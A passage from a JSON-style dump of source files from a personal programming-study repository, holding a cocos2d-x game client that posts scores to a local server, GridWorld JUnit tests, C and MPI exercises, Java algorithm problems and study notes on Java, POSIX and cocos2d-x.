headers;\n\t\t\theaders.push_back(\"Cookie: GAMESESSIONID=\" + Global::gameSessionId);\n\n\t\t\trequest->setUrl(\"http://localhost:8080/submit\");\n\t\t\trequest->setRequestType(HttpRequest::Type::POST);\n\t\t\trequest->setHeaders(headers);\n\t\t\trequest->setRequestData(postData.c_str(), strlen(postData.c_str()));\n\t\t\trequest->setResponseCallback([&](HttpClient *sender, HttpResponse * response) {\n\t\t\t\tif (!response) return;\n\t\t\t\tif (!response->isSucceed()) {\n\t\t\t\t\tscore_field->setText(\"(っ °Д °;)っ:是不是服务器没开\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\trapidjson::Document document;\n\t\t\t\tdocument.Parse<0>(Global::vectorChar2String(response->getResponseData()).c_str());\n\t\t\t\tif (document.HasParseError()) {\n\t\t\t\t\tscore_field->setText(\"(っ °Д °;)っ:后台君在玩蛇\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tif (document.IsObject() && document.HasMember(\"result\")) {\n\t\t\t\t\tif (document[\"result\"].GetBool()) {\n\t\t\t\t\t\tif (document.HasMember(\"info\")) 
{\n\t\t\t\t\t\t\tscore_field->setText(document[\"info\"].GetString());\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\t\tscore_field->setText(document[\"info\"].GetString());\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t});\n\t\t\tcocos2d::network::HttpClient::getInstance()->send(request);\n\t\t\trequest->release();\n\t\t}\n\t});\n\n\trank_button->addClickEventListener([&](Ref* sender) {\n\t\tauto request = new HttpRequest();\n\t\tchar* postData = \"top=10\";\n\t\tvector<string> headers;\n\t\theaders.push_back(\"Cookie: GAMESESSIONID=\" + Global::gameSessionId);\n\n\t\trequest->setUrl(\"http://localhost:8080/rank?top=10\");\n\t\trequest->setRequestType(HttpRequest::Type::GET);\n\t\trequest->setHeaders(headers);\n\t\t// request->setRequestData(postData, strlen(postData));\n\t\trequest->setResponseCallback([&](HttpClient *sender, HttpResponse * response) {\n\t\t\tif (!response) return;\n\t\t\tif (!response->isSucceed()) {\n\t\t\t\trank_field->setText(\"(っ °Д °;)っ:是不是服务器没开\");\n\t\t\t\treturn;\n\t\t\t}\n\t\t\trapidjson::Document document;\n\t\t\tdocument.Parse<0>(Global::vectorChar2String(response->getResponseData()).c_str());\n\t\t\tif (document.HasParseError()) {\n\t\t\t\trank_field->setText(\"(っ °Д °;)っ:后台君在玩蛇\");\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tif (document.IsObject() && document.HasMember(\"result\")) {\n\t\t\t\tif (document[\"result\"].GetBool()) {\n\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\tstring s = document[\"info\"].GetString();\n\t\t\t\t\t\tstd::replace(s.begin(), s.end(), '|', '\\n');\n\t\t\t\t\t\trank_field->setText(s);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\trank_field->setText(document[\"info\"].GetString());\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\t\tcocos2d::network::HttpClient::getInstance()->send(request);\n\t\trequest->release();\n\t});\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.6965855956077576, 
"alphanum_fraction": 0.7100362181663513, "avg_line_length": 26.418439865112305, "blob_id": "53a73a116aae044fb0fda45d17d566ea7bd03c21", "content_id": "d0ac2e85cddbd897c81c848334cb3c35ef108f7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3866, "license_type": "permissive", "max_line_length": 76, "num_lines": 141, "path": "/java/projects/gridworld/Part3/Jumper/test/JumperTest.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import static org.junit.Assert.*;\nimport org.junit.Test;\nimport org.junit.Before;\nimport org.junit.BeforeClass;\n\nimport java.awt.Color;\nimport info.gridworld.grid.Grid;\nimport info.gridworld.grid.Location;\nimport info.gridworld.actor.Bug;\nimport info.gridworld.actor.Rock;\nimport info.gridworld.actor.Actor;\nimport info.gridworld.actor.Flower;\nimport info.gridworld.actor.ActorWorld;\n\n\npublic class JumperTest\n{\n\tprivate static Bug bug = new Bug();\n\tprivate static Rock rock = new Rock();\n\tprivate static Flower flower = new Flower();\n\tprivate static Jumper jumper = new Jumper();\n\tprivate static ActorWorld world = new ActorWorld();\n\n\t@BeforeClass\n\tpublic static void initial() throws Exception {\n\t\tworld.add(bug);\n\t\tworld.add(rock);\n\t\tworld.add(flower);\n\t\tworld.add(jumper);\n\t}\n\n\t@Before\n\tpublic void resetPosition() throws Exception {\n\t\tLocation loc = new Location(0, 0);\n\t\tjumper.moveTo(loc);\n\t\tjumper.setDirection(Location.NORTH);\n\t\tloc = new Location(9, 0);\n\t\tbug.moveTo(loc);\n\t\tbug.setDirection(Location.NORTH);\n\t\tloc = new Location(0, 9);\n\t\tflower.moveTo(loc);\n\t\tflower.setDirection(Location.NORTH);\n\t\tloc = new Location(9, 9);\n\t\trock.moveTo(loc);\n\t\trock.setDirection(Location.NORTH);\n\t}\n\n\t@Test \n\tpublic void test0_0_W()\n\t{\n\t\tLocation loc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, 
jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t}\n\n\t@Test \n\tpublic void test0_1_W()\n\t{\n\t\tLocation loc = new Location(1, 0);\n\t\tjumper.moveTo(loc);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t}\n\n\t@Test \n\tpublic void test2_0_W()\n\t{\n\t\tLocation loc = new Location(2, 0);\n\t\tjumper.moveTo(loc);\n\t\tassertEquals(true, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t}\n\n\t@Test\n\tpublic void test2_0_W_Rock()\n\t{\n\t\tLocation loc = new Location(2, 0);\n\t\tjumper.moveTo(loc);\n\t\tloc = new Location(0, 0);\n\t\trock.moveTo(loc);\n\t\tloc = new Location(2, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(2, 0);\n\t\tassertEquals(true, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 2);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t\tloc = new Location(9, 9);\n\t\trock.moveTo(loc);\n\t}\n\n\t@Test\n\tpublic void test2_0_W_Flower()\n\t{\n\t\tLocation loc = new Location(2, 0);\n\t\tjumper.moveTo(loc);\n\t\tloc = new Location(0, 0);\n\t\tflower.moveTo(loc);\n\t\tloc = new Location(2, 
0);\n\t\tassertEquals(true, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t\t\n\t\tflower = new Flower();\n\t\tworld.add(flower);\n\t}\n}\n\n\n// in shell you can use \n// javac -classpath .:junit-4.9.jar JumperTest.java\n// java -classpath .:junit-4.9.jar -ea org.junit.runner.JUnitCore JumperTest\n" }, { "alpha_fraction": 0.7439024448394775, "alphanum_fraction": 0.7469512224197388, "avg_line_length": 14.619047164916992, "blob_id": "af97b21d37ac63cb2df721736e9e23ab767e197e", "content_id": "e091769223e23ff859b99defe6deef195f3ba08e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 328, "license_type": "permissive", "max_line_length": 55, "num_lines": 21, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/Global.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef GLOBAL_H\n#define GLOBAL_H\n\n#include <string>\n#include <vector>\nusing std::string;\nusing std::vector;\nclass Global\n{\npublic:\n\tGlobal();\n\t~Global();\n\tstatic string gameSessionId;\n\tstatic long score;\n\n\tstatic string vectorChar2String(vector<char> *buffer);\n\n\tstatic string getSessionIdFromHeader(string header);\n};\n\n#endif\n" }, { "alpha_fraction": 0.38881492614746094, "alphanum_fraction": 0.41411450505256653, "avg_line_length": 17.317073822021484, "blob_id": "a0f553bb67f8330dab45211ceaef05233c83c194", "content_id": "ae9a988b46749fd499bff191f3687c658747de2e", "detected_licenses": [ "MIT" ], "is_generated": 
false, "is_vendor": false, "language": "C", "length_bytes": 751, "license_type": "permissive", "max_line_length": 34, "num_lines": 41, "path": "/c/hardwork/hardway/2.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint left[500005], right[500005];\nint n, m, z, x, y, t;\n\nvoid dodo(int n, int m) {\n for (int i = 0; i <= n; i++) {\n left[i] = i - 1;\n right[i] = i + 1;\n }\n while (m--) {\n scanf(\"%d %d %d\", &z, &x, &y);\n right[left[x]] = right[x];\n left[right[x]] = left[x];\n if (1 == z) {\n right[left[y]] = x;\n left[x] = left[y];\n left[y] = x;\n right[x] = y;\n } else {\n left[right[y]] = x;\n right[x] = right[y];\n right[y] = x;\n left[x] = y;\n }\n }\n int index = 0;\n for (int i = 0; i < n; i++) {\n index = right[index];\n printf(\"%d \", index);\n }\n putchar('\\n');\n}\n\nint main() {\n scanf(\"%d\", &t);\n while (t--) {\n scanf(\"%d %d\", &n, &m);\n dodo(n, m);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.7473233342170715, "alphanum_fraction": 0.7708779573440552, "avg_line_length": 28.25, "blob_id": "354bf2ae8e0c53f14ef01be1360301e8af1375c6", "content_id": "0c70594e85bd0dea6635af45238802f1264d1cf0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 661, "license_type": "permissive", "max_line_length": 275, "num_lines": 16, "path": "/c/projects/POSIX/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C POSIX library\n> The C POSIX library is a specification of a C standard library for POSIX systems. It was developed at the same time as the ANSI C standard. Some effort was made to make POSIX compatible with standard C; POSIX includes additional functions to those introduced in standard C.\n\n## Lab1 \n1. 加深对进程概念的理解,明确进程和程序的区别。进一步认识并发执行的实质。\n2. 了解信号处理。\n3. 认识进程间通信(IPC):进程间共享内存\n4. 实现shell:了解程序运行。\n\n## Lab2\n1. 用线程生成Fibonacci数列\n2. 多线程矩阵乘法\n\n## Lab3\n1. 生产者消费者问题\n2. 
读者写者问题" }, { "alpha_fraction": 0.5548872351646423, "alphanum_fraction": 0.6112781763076782, "avg_line_length": 26.6875, "blob_id": "ce1f1fb9e441423f411bb59bf8cd61c88f6ea723", "content_id": "ccfb17fec19e41b52b7c5f149fcba1e8244bdb03", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1330, "license_type": "permissive", "max_line_length": 96, "num_lines": 48, "path": "/c/projects/MPI/hardway/MPI_pack.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n// [Surface-Pro-3:8772] *** An error occurred in MPI_Unpack\n// [Surface-Pro-3:8772] *** reported by process [1590624257,1]\n// [Surface-Pro-3:8772] *** on communicator MPI_COMM_WORLD\n// [Surface-Pro-3:8772] *** MPI_ERR_TRUNCATE: message truncated\n// [Surface-Pro-3:8772] *** MPI_ERRORS_ARE_FATAL (processes in this communicator will now abort,\n// [Surface-Pro-3:8772] *** and potentially your MPI job)\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, source;\n MPI_Status status;\n int i, j, position;\n int k[2];\n int buf[1000];\n\n MPI_Init(&argc, &argv);\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n i = 1;\n j = 2;\n\n if (myid == 0) {\n position = 0;\n\n MPI_Pack(&i, 1, MPI_INT, buf, 1000, &position, MPI_COMM_WORLD);\n MPI_Pack(&j, 1, MPI_INT, buf, 1000, &position, MPI_COMM_WORLD);\n\n MPI_Send(buf, position, MPI_PACKED, 1, 99, MPI_COMM_WORLD);\n } else if (myid == 1) {\n MPI_Recv(k, 2, MPI_INT, 0, 99, MPI_COMM_WORLD, &status);\n\n position = 0;\n i = j = 0;\n\n // your code here\n MPI_Unpack(k, 2, &position, &i, 1, MPI_INT, MPI_COMM_WORLD);\n MPI_Unpack(k, 2, &position, &j, 1, MPI_INT, MPI_COMM_WORLD);\n // end of your code\n\n printf(\"The number is %d and %d\", i, j);\n }\n\n MPI_Finalize();\n return 0;\n}\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.75, "avg_line_length": 72, "blob_id": 
"9ecc282fdcbc6223e0367b2a67b1b1e2f5a490a9", "content_id": "f7de81d047a7b78862a11824c9f7b46490f9528d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 72, "license_type": "permissive", "max_line_length": 72, "num_lines": 1, "path": "/bash/hardwork/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "Some code when I learn [TLCL book](http://billie66.github.io/TLCL/book/)" }, { "alpha_fraction": 0.41737648844718933, "alphanum_fraction": 0.4412265717983246, "avg_line_length": 21.615385055541992, "blob_id": "7dc1e4d0b5618379b383026814ddc872cbabba7d", "content_id": "aa913dd4ce4db718dfa87e5aa803e6a355287354", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 587, "license_type": "permissive", "max_line_length": 59, "num_lines": 26, "path": "/java/projects/algorithms/chapter1/part1/Q30.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q30\n */\npublic class Q30 {\n public static void main(String[] args) {\n int size = Integer.parseInt(args[0]);\n boolean [][] table = new boolean[size][size];\n\n for (int i = 0; i < size; i++) {\n for (int j = 0; j < size; j++) {\n table[i][j] = !(i != 0 && j!= 0 && gcd(i, j) != 1);\n }\n }\n\n for (int i = 0; i < size; i++) {\n for (int j = 0; j < size; j++) {\n System.out.printf(\"%5b \", table[i][j]); \n }\n System.out.printf(\"\\n\"); \n }\n }\n\n public static int gcd(int a, int b) {\n return a % b == 0 ? 
b : gcd(b, a % b);\n }\n}" }, { "alpha_fraction": 0.45869946479797363, "alphanum_fraction": 0.47803163528442383, "avg_line_length": 20.11111068725586, "blob_id": "6ddf22a3787de32a96767b4b8f0f488aada1f3c5", "content_id": "fa3db056f6cb21022199af59855421c9e3edcd32", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 569, "license_type": "permissive", "max_line_length": 47, "num_lines": 27, "path": "/java/projects/algorithms/chapter1/part1/Q31.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Random;\n\n/**\n * Q31\n */\npublic class Q31 {\n public static void main(String[] args) {\n int n = Integer.parseInt(args[0]);\n double p = Double.parseDouble(args[1]);\n\n boolean [][] table = new boolean[n][n];\n\n for (int i = 0; i < n; i++) {\n for (int j = 0; j < n; j++) {\n Random random = new Random();\n table[i][j] = random.nextDouble() < p;\n }\n }\n\n for (int i = 0; i < n; i++) {\n for (int j = 0; j < n; j++) {\n System.out.printf(\"%5b \", table[i][j]);\n }\n System.out.print(\"\\n\");\n }\n }\n}" }, { "alpha_fraction": 0.5386138558387756, "alphanum_fraction": 0.5432343482971191, "avg_line_length": 36.849998474121094, "blob_id": "d0a9004f7890ca803ff5d0172a175908ae142a80", "content_id": "cbf9bb1127729aa28534a8f4e19772f6d1d8755c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3249, "license_type": "permissive", "max_line_length": 140, "num_lines": 40, "path": "/java/docs/ThinkInJava.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Think-In-Java\n> 起因是需要先打好Java基础,那就一定要多看书。\n\n## 前言\n1. Java的目标是减轻程序员的负担。\n2. 编程效率的提高使得大量网络程序的设计成为可能,增加了人们的通信带宽。\n\n## 对象入门\n\n1. 抽象的进步,从“命令式”语言(如C,FORTRAN)到特殊的建模语言(如LISP与表,APL与算法)再到面向对象的程序设计(以下简称OOP),使用对象的组合来解决问题。\n2. 在OOP中,对象是包含数据和操作的集合。程序是一大堆对象的组合,通过对象间的消息传递(互相调用接口)来推进执行。可以通过封装当前对象制造出新的对象,同一类对象的相同的操作在封装后得到保留并可以修改。\n3. 
设置类边界:public private friendly protected\n```\n | Class | Package | Subclass | Subclass | World\n | | |(same pkg)|(diff pkg)| \n————————————+———————+—————————+——————————+——————————+————————\npublic | + | + | + | + | + \n————————————+———————+—————————+——————————+——————————+————————\nprotected | + | + | + | + | \n————————————+———————+—————————+——————————+——————————+————————\nno modifier | + | + | + | | \n————————————+———————+—————————+——————————+——————————+————————\nprivate | + | | | | \n\n+ : accessible\nblank : not accessible\n```\n4. 实现多形性的方法叫做动态绑定。\n5. 抽象的基础类和接口:abstract interface\n\n\n## 对象入门\n\n+ 大多数程序员的首要任务是用现有的对象解决自己的问题,事实上,只有相当少的“专家”能设计出让别人享用的对象。\n+ 解决问题的复杂程度直接取决于抽象的种类及质量\n + 许多“命令式”语言(如FORTRAN,BASIC和C)是对汇编语言的一种抽象。\n + 一些早期语言来说,如LISP和APL,它们的做法是“从不同的角度观察世界”——“所有问题都归纳为列表”或“所有问题都归纳为算法”。PROLOG则将所有问题都归纳为决策链。\n + 面向对象的程序设计在此基础上则跨出了一大步,程序员可利用一些工具表达问题空间内的元素。\n+ 从技术角度说,OOP(面向对象程序设计)只是涉及抽象的数据类型、继承以及多形性。\n+ 单根结构中的所有对象都有一个通用接口,所以它们最终都属于相同的类型。单根结构中的所有对象(比如所有Java对象)都可以保证拥有一些特定的功能。利用单根结构,我们可以更方便地实现一个垃圾收集器。与此有关的必要支持可安装于基础类中,而垃圾收集器可将适当的消息发给系统内的任何对象。\n\n" }, { "alpha_fraction": 0.6365979313850403, "alphanum_fraction": 0.6391752362251282, "avg_line_length": 20.61111068725586, "blob_id": "a847f3e5026dc0bafb1d6631765804680d465ffb", "content_id": "319899017eeada0cb1d163e63cfbf1ab95dea1d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 428, "license_type": "permissive", "max_line_length": 61, "num_lines": 18, "path": "/c/projects/MPI/hardway/MPI_name.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int len;\n char name[MPI_MAX_PROCESSOR_NAME];\n MPI_Init(&argc, &argv);\n\n // int MPI_Get_processor_name ( char *name, int *resultlen)\n // char *name : 实际节点的唯一说明字;\n // int *resultlen:在name中返回结果的长度;\n MPI_Get_processor_name(name, &len);\n\n printf(\"Hello, world. 
I am %s.\\n\", name);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.6494413614273071, "alphanum_fraction": 0.6764432191848755, "avg_line_length": 27.236841201782227, "blob_id": "11064d67664edc856b3825657daff62be5305d7a", "content_id": "8239759218012b3fb98d86381433f6fbf642b514", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2150, "license_type": "permissive", "max_line_length": 115, "num_lines": 76, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week10/Classes/MenuSence.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"MenuSence.h\"\n#include \"GameSence.h\"\nUSING_NS_CC;\n\nScene* MenuSence::createScene()\n{\n // 'scene' is an autorelease object\n auto scene = Scene::create();\n\n // 'layer' is an autorelease object\n auto layer = MenuSence::create();\n\n // add layer as a child to scene\n scene->addChild(layer);\n\n // return the scene\n return scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool MenuSence::init()\n{\n\n if ( !Layer::init() )\n {\n return false;\n }\n\n Size visibleSize = Director::getInstance()->getVisibleSize();\n Vec2 origin = Director::getInstance()->getVisibleOrigin();\n\n\tauto bg_sky = Sprite::create(\"menu-background-sky.jpg\");\n\tbg_sky->setPosition(Vec2(visibleSize.width / 2 + origin.x, visibleSize.height / 2 + origin.y + 150));\n\tthis->addChild(bg_sky, 0);\n\n\tauto bg = Sprite::create(\"menu-background.png\");\n\tbg->setPosition(Vec2(visibleSize.width / 2 + origin.x, visibleSize.height / 2 + origin.y - 60));\n\tthis->addChild(bg, 0);\n\n\tauto miner = Sprite::create(\"menu-miner.png\");\n\tminer->setPosition(Vec2(150 + origin.x, visibleSize.height / 2 + origin.y - 60));\n\tthis->addChild(miner, 1);\n\n\tauto leg = Sprite::createWithSpriteFrameName(\"miner-leg-0.png\");\n\tAnimate* legAnimate = 
Animate::create(AnimationCache::getInstance()->getAnimation(\"legAnimation\"));\n\tleg->runAction(RepeatForever::create(legAnimate));\n\tleg->setPosition(110 + origin.x, origin.y + 102);\n\tthis->addChild(leg, 1);\n\n\tauto stone = Sprite::create(\"menu-start-gold.png\");\n\tstone->setPosition(700, 150);\n\tthis->addChild(stone, 1);\n\n\n\t// my job now \n\tauto start = MenuItemImage::create(\n\t\t\"start-0.png\",\n\t\t\"start-1.png\",\n\t\tCC_CALLBACK_1(MenuSence::menuStartCallback, this));\n\n\tstart->setPosition(Vec2(origin.x + stone->getPositionX(),\n\t\t\t\t\t origin.y + stone->getPositionY() + 50));\n\n\t// create menu, it's an autorelease object\n\tauto menu = Menu::create(start, NULL);\n\tmenu->setPosition(Vec2(0, 0));\n\tthis->addChild(menu, 1);\n\n\n return true;\n}\n\nvoid MenuSence::menuStartCallback(Ref* pSender)\n{\n\tDirector::getInstance()->replaceScene( TransitionFade::create(2, GameSence::createScene(), Color3B(255,255,255)));\n}\n\n\n" }, { "alpha_fraction": 0.4935806095600128, "alphanum_fraction": 0.5007132887840271, "avg_line_length": 32.42856979370117, "blob_id": "9b6a7e198a1d1f2853455f98583848582e072a62", "content_id": "508cec194fe2860948a9c53bbec3cdf2644aeaa9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 701, "license_type": "permissive", "max_line_length": 81, "num_lines": 21, "path": "/java/projects/algorithms/chapter1/part1/Q3.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Collection;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\nclass Q3 {\n public static void main(String[] args) {\n assert (args.length > 1);\n int result = Arrays.asList(args)\n .stream()\n .map(x -> {\n return Integer.parseInt(x) == Integer.parseInt(args[0]);\n })\n .collect(Collectors.toList()).stream()\n .map(x -> x ? 
1 : 0)\n .mapToInt(Integer::intValue)\n .sum();\n System.out.print(args.length == result ? \"equal\": \"not equal\");\n }\n}" }, { "alpha_fraction": 0.6347032189369202, "alphanum_fraction": 0.6369863152503967, "avg_line_length": 19.904762268066406, "blob_id": "ab15e70d89d3fc018fb943e885720faebb46855c", "content_id": "20e208810d1db73bcb85134ba9484a4ee133b3d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 438, "license_type": "permissive", "max_line_length": 50, "num_lines": 21, "path": "/c/projects/MPI/hardway/MPI_barrier.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n double start, finish;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n start = MPI_Wtime();\n MPI_Barrier(MPI_COMM_WORLD);\n printf(\"I'm rank %d of %d\", myid, numprocs);\n finish = MPI_Wtime();\n printf(\"running %f seconds.\\n\", finish - start);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.30779391527175903, "alphanum_fraction": 0.3778071403503418, "avg_line_length": 17.487804412841797, "blob_id": "ca099387ef9a1840ebfe2a01e804f3ad6f53e64b", "content_id": "95806184b9307fa1dbcad923b7853c4ee3b0edbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 757, "license_type": "permissive", "max_line_length": 42, "num_lines": 41, "path": "/java/projects/algorithms/chapter1/part1/Q7.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q7\n */\n\npublic class Q7 {\n public static void main(String[] args) {\n // a\n TestCodes.test(() -> {\n double t = 9.0;\n while (Math.abs(t - 9.0/t) > .001) {\n t = (9.0/t + t) / 2.0;\n }\n System.out.printf(\"%.5f\", t);\n return 0;\n }, \"3.00009\");\n\n // b\n TestCodes.test(() -> {\n int sum = 0;\n for (int i = 0; i 
< 1000; i++) {\n for (int j = 0; j < i; j++) {\n sum++;\n }\n }\n System.out.print(sum);\n return 0;\n }, \"499500\");\n\n // c\n TestCodes.test(() -> {\n int sum = 0;\n for (int i = 1; i < 1000; i*=2) {\n for (int j =0; j < 1000; j++ ) {\n sum++;\n }\n }\n System.out.print(sum);\n return 0;\n }, \"10000\");\n }\n}" }, { "alpha_fraction": 0.47074466943740845, "alphanum_fraction": 0.4893617033958435, "avg_line_length": 27.923076629638672, "blob_id": "7d57207d1a914bad129121b05e709a331449efd3", "content_id": "c8b4bcfd3af6875f075a02938b2a4232b5433b87", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 376, "license_type": "permissive", "max_line_length": 63, "num_lines": 13, "path": "/c/hardwork/hardway/short_int_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main() {\n int x = 1;\n short int i = 2;\n float f = 3;\n if (sizeof((x == 2) ? f : i) == sizeof(float)) {\n printf(\"float\\n\");\n printf(\"%ld %ld\", sizeof((x == 2) ? f : i), sizeof(float));\n } else if (sizeof((x == 2) ? f : i) == sizeof(short int)) {\n printf(\"short int\\n\");\n printf(\"%ld %ld\", sizeof((x == 2) ? 
f : i), sizeof(float));\n }\n}\n" }, { "alpha_fraction": 0.6766917109489441, "alphanum_fraction": 0.7052631378173828, "avg_line_length": 27.95652198791504, "blob_id": "e22b54c91541f8e4cf29db714eb8bd77dd89cc2c", "content_id": "7079951da434d68787259ead30144c86477a4b91", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 665, "license_type": "permissive", "max_line_length": 127, "num_lines": 23, "path": "/cplusplus/projects/Cocos2dx/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# COCOS2DX\n`jskyzero` `2017/10/13`\n\n## Overview\nCocos2d-x is a suite of open-source, cross-platform, game-development tools used by thousands of developers all over the world.\n\n![framework_architecture](https://github.com/cocos2d/cocos2d-x/blob/v3/docs/framework_architecture.jpg)\n\n## Install & Run\n+ Download: You Can Download From [cocos2d-x.org](http://www.cocos2d-x.org/download)\n+ Install: \n ```\n python setup.py\n ```\n+ Initial a Cpp Project: \n ```\n cocos new project_name -l cpp\n ``` \n Because I install python3.x in windows, so I need to edit `cocos.bat` and change `python` to `py -2`\n\n## Reference\n\n+ [cocos2d-x.org/docs](http://cocos2d-x.org/docs/)" }, { "alpha_fraction": 0.4531722068786621, "alphanum_fraction": 0.47129908204078674, "avg_line_length": 15.550000190734863, "blob_id": "03509e5ef0c4bb6f9c63a843f783fe5e10215761", "content_id": "5e10c2379763ef79197b4faf76724f103b70ec40", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 331, "license_type": "permissive", "max_line_length": 70, "num_lines": 20, "path": "/c/hardwork/hardway/student_struct.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nstruct student {\n int n;\n int math;\n int english;\n int C;\n int total;\n} a[1005];\n\nint main() {\n int N, i;\n scanf(\"%d\", &N);\n for (i = 1; i <= N; i++) {\n scanf(\"%d 
